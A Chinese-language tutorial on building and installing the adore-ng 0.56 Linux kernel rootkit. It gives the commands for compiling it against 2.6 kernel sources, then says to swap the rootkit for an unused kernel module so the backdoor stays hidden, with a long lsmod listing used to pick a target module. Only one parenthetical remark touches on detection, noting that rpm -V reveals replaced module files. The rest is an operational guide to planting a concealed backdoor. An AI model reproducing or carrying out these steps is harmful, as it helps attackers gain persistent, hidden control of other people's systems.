Linux内核级后门Adore

#wget         下载
#unzip adore-ng-0.56.zip        解压
#cd adore-ng-0.56
#cp Makefile.2.6 Makefile        使用2.6内核的Makefile
#make        编译
提示没有/usr/src/linux目录
#vi Makefile        查看一下发现是需要内核源码

挂载光盘以后安装kernel-devel包,或者直接yum -y install kernel-devel
#rpm -ivh kernel-devel-2.6.18-128.el5.i686.rpm
#ln -s /usr/src/kernels/2.6.18-128.el5-i686/ /usr/src/linux       创建软链接
#make        重新编译adore
用我们rootkit的模块替换未被使用的内核模块(从检测角度看:若软件包自带的模块文件被替换,其校验值会与软件包数据库中的记录不一致,可用 rpm -V 校验内核包文件来发现)
#lsmod        看下used by 为0的
Module                  Size  Used by
nls_utf8                6209  1
autofs4                24261  2
hidp                   23105  2
rfcomm                 42457  0
l2cap                  29505  10 hidp,rfcomm
bluetooth              53797  5 hidp,rfcomm,l2cap
sunrpc                144765  1
ipt_REJECT              9537  0
ip6t_REJECT             9409  1
xt_tcpudp               7105  6
ip6table_filter         6849  1
ip6_tables             18053  1 ip6table_filter
x_tables               17349  4 ipt_REJECT,ip6t_REJECT,xt_tcpudp,ip6_tables
dm_mirror              23109  0
dm_multipath           24013  0
scsi_dh                11713  1 dm_multipath
video                  21193  0
hwmon                   7365  0
backlight              10049  1 video
sbs                    18533  0
i2c_ec                  9025  1 sbs
button                 10705  0
battery                13637  0
asus_acpi              19289  0
ac                      9157  0
ipv6                  261473  17 ip6t_REJECT
xfrm_nalgo             13381  1 ipv6
crypto_api             12609  1 xfrm_nalgo
lp                     15849  0
snd_ens1371            28513  0
gameport               18633  1 snd_ens1371
snd_rawmidi            26561  1 snd_ens1371
snd_ac97_codec         93025  1 snd_ens1371
ac97_bus                6337  1 snd_ac97_codec
snd_seq_dummy           7877  0
snd_seq_oss            32577  0
pcspkr                  7105  0
snd_seq_midi_event     11073  1 snd_seq_oss
snd_seq                49585  5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event
floppy                 57125  0
sg                     36189  0
snd_seq_device         11725  4 snd_rawmidi,snd_seq_dummy,snd_seq_oss,snd_seq
snd_pcm_oss            42817  0
snd_mixer_oss          19009  1 snd_pcm_oss
snd_pcm                72133  3 snd_ens1371,snd_ac97_codec,snd_pcm_oss
snd_timer              24517  2 snd_seq,snd_pcm
snd                    55237  10 snd_ens1371,snd_rawmidi,snd_ac97_codec,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer
soundcore              11553  1 snd
pcnet32                35269  0
mii                     9409  1 pcnet32
i2c_piix4              12237  0
snd_page_alloc         14281  1 snd_pcm
i2c_core               23745  2 i2c_ec,i2c_piix4
ide_cd                 40161  1
serio_raw              10693  0
cdrom                  36577  1 ide_cd
parport_pc             29157  1
parport                37513  2 lp,parport_pc
dm_raid45              66509  0
dm_message              6977  1 dm_raid45
dm_region_hash         15681  1 dm_raid45
dm_log                 14529  3 dm_mirror,dm_raid45,dm_region_hash
dm_mod                 62201  4 dm_mirror,dm_multipath,dm_raid45,dm_log
dm_mem_cache            9537  1 dm_raid45
ata_piix               23621  0
libata                156677  1 ata_piix
mptspi                 23625  3
mptscsih               36929  1 mptspi
mptbase                76901  2 mptspi,mptscsih
scsi_transport_spi     26305  1 mptspi
sd_mod                 25153  4
scsi_mod              141589  7 scsi_dh,sg,libata,mptspi,mptscsih,scsi_transport_spi,sd_mod
ext3                  124233  2
jbd                    56937  1 ext3
uhci_hcd               25421  0
ohci_hcd               24681  0
ehci_hcd               33357  0
